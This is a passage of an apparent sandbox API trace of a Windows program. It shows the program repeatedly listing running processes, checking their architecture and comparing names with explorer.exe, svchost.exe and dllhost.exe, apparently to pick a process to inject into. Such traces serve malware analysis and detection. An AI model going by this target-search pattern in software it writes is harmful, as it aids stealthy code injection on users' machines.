hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0231.164] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xec [0231.164] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0231.164] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0231.164] CloseHandle (hObject=0xec) returned 1 [0231.164] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="explorer.exe") returned 1 [0231.164] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="svchost.exe") returned -1 [0231.164] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="dllhost.exe") returned 1 [0231.164] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0231.165] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xec [0231.165] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0231.165] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0231.165] CloseHandle (hObject=0xec) returned 1 [0231.165] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="explorer.exe") returned -1 [0231.165] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="svchost.exe") returned -1 [0231.165] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="dllhost.exe") returned 1 [0231.165] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0231.166] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xec [0231.166] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0231.166] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0231.166] CloseHandle (hObject=0xec) returned 1 [0231.166] lstrcmpiA (lpString1="population openings.exe", lpString2="explorer.exe") returned 1 [0231.166] lstrcmpiA (lpString1="population openings.exe", lpString2="svchost.exe") returned -1 [0231.166] lstrcmpiA (lpString1="population openings.exe", lpString2="dllhost.exe") returned 1 [0231.166] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0231.166] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0231.166] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0231.167] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0231.167] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0231.167] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0231.167] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0231.168] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0231.168] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0231.168] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0231.168] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0231.169] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xec [0231.169] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0231.169] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0231.169] CloseHandle (hObject=0xec) returned 1 [0231.169] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0231.170] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xec [0231.170] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0231.170] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0231.170] CloseHandle (hObject=0xec) returned 1 [0231.170] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0231.170] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0231.170] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0231.171] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xec [0231.171] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0231.171] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0231.171] CloseHandle (hObject=0xec) returned 1 [0231.171] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0231.171] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0231.171] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xec [0231.171] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0231.171] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0231.171] CloseHandle (hObject=0xec) returned 1 [0231.171] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0231.172] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0231.172] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xec [0231.172] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0231.172] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0231.172] CloseHandle (hObject=0xec) returned 1 [0231.172] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0231.173] CloseHandle (hObject=0xe8) returned 1 [0231.173] Sleep (dwMilliseconds=0x3e8) [0232.208] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0232.209] Process32First (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0232.210] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0232.210] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0232.210] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0232.210] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0232.211] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0232.211] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0232.211] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0232.211] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0232.212] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0232.212] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0232.212] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0232.212] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0232.213] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0232.213] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0232.213] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0232.213] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0232.214] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0232.214] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0232.214] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0232.214] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.215] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0232.215] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.215] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0232.215] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.216] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0232.216] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.216] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0232.216] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.217] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0232.217] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0232.217] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0232.217] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.218] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0232.218] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.218] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0232.218] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0232.219] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xec [0232.219] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0232.219] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0232.219] CloseHandle (hObject=0xec) returned 1 [0232.219] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0232.219] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0232.219] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0232.220] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xec [0232.220] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0232.220] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0232.220] CloseHandle (hObject=0xec) returned 1 [0232.220] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.220] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0232.220] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0232.221] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0232.221] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0232.221] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xec [0232.221] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0232.221] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0232.221] CloseHandle (hObject=0xec) returned 1 [0232.221] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="explorer.exe") returned -1 [0232.221] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="svchost.exe") returned -1 [0232.222] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="dllhost.exe") returned -1 [0232.222] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0232.222] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xec [0232.222] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0232.222] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0232.222] CloseHandle (hObject=0xec) returned 1 [0232.222] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="explorer.exe") returned -1 [0232.222] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="svchost.exe") returned -1 [0232.222] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="dllhost.exe") returned -1 [0232.222] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0232.223] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xec [0232.223] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0232.223] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0232.223] CloseHandle (hObject=0xec) returned 1 [0232.223] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="explorer.exe") returned 1 [0232.223] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="svchost.exe") returned -1 [0232.223] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="dllhost.exe") returned 1 [0232.223] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0232.223] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xec [0232.223] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0232.223] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0232.223] CloseHandle (hObject=0xec) returned 1 [0232.224] lstrcmpiA (lpString1="definitely.exe", lpString2="explorer.exe") returned -1 [0232.224] lstrcmpiA (lpString1="definitely.exe", lpString2="svchost.exe") returned -1 [0232.224] lstrcmpiA (lpString1="definitely.exe", lpString2="dllhost.exe") returned -1 [0232.224] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0232.224] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xec [0232.224] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0232.224] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0232.224] CloseHandle (hObject=0xec) returned 1 [0232.224] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="explorer.exe") returned 1 [0232.224] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="svchost.exe") returned -1 [0232.224] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="dllhost.exe") returned 1 [0232.224] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0232.225] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xec [0232.225] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0232.225] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0232.225] CloseHandle (hObject=0xec) returned 1 [0232.225] lstrcmpiA (lpString1="whenever.exe", lpString2="explorer.exe") returned 1 [0232.225] lstrcmpiA (lpString1="whenever.exe", lpString2="svchost.exe") returned 1 [0232.225] lstrcmpiA (lpString1="whenever.exe", lpString2="dllhost.exe") returned 1 [0232.225] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0232.225] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xec [0232.226] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0232.226] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0232.226] CloseHandle (hObject=0xec) returned 1 [0232.226] lstrcmpiA (lpString1="potentially.exe", lpString2="explorer.exe") returned 1 [0232.226] lstrcmpiA (lpString1="potentially.exe", lpString2="svchost.exe") returned -1 [0232.226] lstrcmpiA (lpString1="potentially.exe", lpString2="dllhost.exe") returned 1 [0232.226] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0232.226] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xec [0232.226] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: 